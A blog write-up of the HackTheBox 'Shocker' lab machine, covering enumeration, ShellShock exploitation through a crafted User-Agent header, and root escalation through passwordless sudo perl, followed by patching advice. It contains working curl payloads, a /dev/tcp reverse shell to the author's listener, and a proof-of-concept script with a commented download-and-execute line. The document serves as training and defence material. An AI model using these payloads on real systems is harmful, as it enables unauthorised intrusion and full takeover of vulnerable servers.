Bradmanfordson's Blog

Christian | Offensive Security Aficionado | Puppy Herder | Critter Catcher | Bourbon Sipper | Cigar Smoker

View on GitHub
7 July 2021

Shocker

Difficulty: Easy
Operating System: Linux
IP Address: 10.10.10.56
Exploit: ShellShock
Escalation: sudo /usr/bin/perl

Alright! Welcome to my first writeup, ShellShock was the first vulnerability I ever exploited outside of Metasploit! So this box is super special to me. Since I’m pretty familiar with this kind of vulnerability, let’s do this entire box using ONLY the command line!

Enumeration

Let’s begin with a simple ping see if our target responds to ICMP:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ ping 10.10.10.56
PING 10.10.10.56 (10.10.10.56) 56(84) bytes of data.
64 bytes from 10.10.10.56: icmp_seq=1 ttl=63 time=31.9 ms
64 bytes from 10.10.10.56: icmp_seq=2 ttl=63 time=32.6 ms
64 bytes from 10.10.10.56: icmp_seq=3 ttl=63 time=32.5 ms
^C
--- 10.10.10.56 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 31.864/32.323/32.616/0.328 ms

Nice! Let’s go ahead and run nmap and see what ports are open:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nmap -p- --max-retries 1 10.10.10.56                                            
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 21:35 CDT
Nmap scan report for 10.10.10.56
Host is up (0.082s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1

Nmap done: 1 IP address (1 host up) scanned in 12.96 seconds

I used a few interesting flags in that:

  1. -p-: specifies that I want nmap to run against all ports (except 0…)
  2. --max-retries 1: Caps the number of port scan probe retransmissions - meaning it’ll only attempt to connect to a port 2 times, 1 for initial hit, and 1 retry. This just makes the scan run faster… However, we have the potential to still miss ports.

Okay so we found port 80 and 2222 are open, I’m going to target the webpage first (port 80). First thing’s first, let’s fuzz common web directories and see what we’re looking at. To do this, I’ll be using a new tool I found, Feroxbuster.

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ feroxbuster -u http://10.10.10.56:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x sh bash php -s 200 204 301

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.3.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.56:80/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ [200, 204, 301]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [sh, bash, php]
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200        9l       13w      137c http://10.10.10.56/index.html
200        7l       18w        0c http://10.10.10.56/cgi-bin/user.sh
[####################] - 23s   112464/112464  0s      found:2       errors:0      
[####################] - 20s    18744/18744   931/s   http://10.10.10.56:80/
[####################] - 19s    18744/18744   939/s   http://10.10.10.56/cgi-bin/

We found an interesting page: /cgi-bin/user.sh. A quick curl reveals the following:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ curl http://10.10.10.56/cgi-bin/user.sh
Content-Type: text/plain

Just an uptime test script

23:09:28 up  1:04,  0 users,  load average: 0.00, 0.00, 0.00

Good rule of thumb with /cgi-bin/[page].sh is to check for ShellShock. We can use the http-shellshock.nse script with nmap to test for ShellShock.

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nmap -p 80 --script http-shellshock.nse --script-args uri=/cgi-bin/user.sh 10.10.10.56
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-06 21:37 CDT
Nmap scan report for 10.10.10.56
Host is up (0.041s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       http://seclists.org/oss-sec/2014/q3/685
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Nmap done: 1 IP address (1 host up) scanned in 0.88 seconds

Well look at that, it reports vulnerable! (imagine my shock - pun 100% intended)


Exploitation

Alright, let’s just double-check and see if we can manually inject code.

First we’ll start a netcat listener using nc -lnvp 12345, then we’ll execute the following:

curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'echo BRADMAN | nc 10.10.16.192 12345'" http://10.10.10.56/cgi-bin/user.sh

Okay, okay, slow down, what the hell did I just do?

Let’s start at nc -lnvp 12345, this is going to open up a network listener on our local machine on port 12345, meaning we are opening up that port and reporting back any connection information sent to it. We do this with the flag -lnvp:

  1. -l: Listener mode for inbound connects
  2. -n: numeric IP Addresses only, no dns
  3. -v: verbose mode
  4. -p PORT: the port we’re wanting to open up, in this case: 12345

NetCat is pretty cool and lets us just string all these flags together as -lnvp or -nvlp or -vlnp or … well… you should get the idea.

Next, we need to actually exploit ShellShock - there are super good explanations online for ShellShock, this one is one of my favorite’s. I recommend reading through that if you’re unfamiliar with ShellShock.

So, my actual payload in the curl command is
/bin/bash -c 'echo BRADMAN | nc 10.10.16.192 12345'
What this does echo’s “BRADMAN” to netcat, but instead of listening, we’re actually connecting to an IP Address, specifically, my attacker box, and on the port we opened, 12345. When we execute this curl command, we get the following on our netcat listener:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nc -lnvp 12345  
listening on [any] 12345 ...
connect to [10.10.16.192] from (UNKNOWN) [10.10.10.56] 48194
BRADMAN

NICE! We were not only able to execute code on the target machine, but actually send a message back to our attacker machine! Alright, let’s see if we can get a fully interactive reverse shell. We’ll try to get a /dev/tcp reverse shell using the following:
bash -i >& /dev/tcp/10.10.16.192/12345 0>&1
If this works, we should expect to get a fully interactive reverse shell back on our netcat listener (we’ll have to restart our netcat listener).

Exploit:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.192/12345 0>&1'" http://10.10.10.56/cgi-bin/user.sh

Shell:

┌──(kali㉿kali)-[~/htb/Shocker]
└─$ nc -lnvp 12345
listening on [any] 12345 ...
connect to [10.10.16.192] from (UNKNOWN) [10.10.10.56] 48196
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ id
id
uid=1000(shelly) gid=1000(shelly) groups=1000(shelly),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
shelly@Shocker:/usr/lib/cgi-bin$


Escalation

VERY NICE! Okay, we are now controlling the target machine as user shelly whomever that is… Let’s look around and see if we can escalate our privileges to root.

shelly@Shocker:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/usr/lib/cgi-bin$

First thing I always check is what can the current user run as sudo but without a password. To do this, we can run sudo -l, if we’re prompted for a password and we don’t know it, then we’re out of luck…. however, we’re not out of luck here! We are able to run /usr/bin/perl as sudo without the need of a password. Huh, a programming language that we can run as root - I wonder whatever we’ll be able to do with that? Maybe, tell it to start a new shell?

Yup! If you don’t know immediately what to do, don’t worry about it, let’s go to GTFOBins and look up perl to see if it has anything. If we search perl we can see that we can run a myriad of things, the one we’re most interested in is sudo. According to GTFOBins, we can run sudo perl -e 'exec "/bin/sh";' and get a shell.. However, look at the results of sudo -l and you’ll see that we need a TINY adjustment, we just need to specify the full path of perl. Easy enough:

shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
sudo /usr/bin/perl -e 'exec "/bin/bash";'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
uname -a
Linux Shocker 4.4.0-96-generic #119-Ubuntu SMP Tue Sep 12 14:59:54 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Alright, now we’re talking. We don’t have a pretty shell but we’re root! And it was pretty easy too. And there we have it, we’ve exploited the machine and obtained root permissions, from here we can read the /home/shelly/user.txt and the /root/root.txt and get our whole 0 points from HackTheBox!

shelly@Shocker:/usr/lib/cgi-bin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
sudo /usr/bin/perl -e 'exec "/bin/bash";'
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cat /home/shelly/user.txt
13f51b<-- REDACTED -->
cat /root/root.txt  
b1fd49<-- REDACTED -->


Super basic POC

#!/usr/bin/bash

# Super Basic POC Exploit code for HackTheBox Shocker
# Utilizes the ShellShock exploit

# Author: Brad Roberts

if [ $# -lt 2 ];then
    echo "Usage: $0 [LHOST] [LPORT]"
    exit 1
fi

LHOST=$1
LPORT=$2

TARGET="http://10.10.10.56/cgi-bin/user.sh"

PAYLOAD="/bin/bash -c 'bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1'"
# Fan of Bishop Fox and use Sliver? Build a mtls payload using `generate --os linux --mtls <your attacker ip> -N sploit`
# oh and make sure to make it world readable when you start up your webserver :)
# PAYLOAD="/bin/bash -c 'cd /tmp; curl http://${LHOST}:8080/sploit -o sploit; chmod +x sploit; /tmp/sploit &'"

curl -H "User-Agent: () { :; }; echo; echo; ${PAYLOAD}" ${TARGET}


I’m vulnerable to ShellShock, how do I fix this?

First off, your webpage might just be vulnerable to OS Injection that happens to look like ShellShock. It’s prolly vulnerable but just to be sure, double check by running the following:
env val='() { :; }; echo VULNERABLE' bash -c "echo Hello World"

If you see VULNERABLE then, you guessed it…

This is a vulnerability in bash itself so to fix this, you’ll have to update bash.

Update with apt:
sudo apt-get update && sudo apt-get install --only-upgrade bash

Update with yum:
sudo yum update bash

Good rule of thumb is to always stay up-to-date on patches!

tags: HTB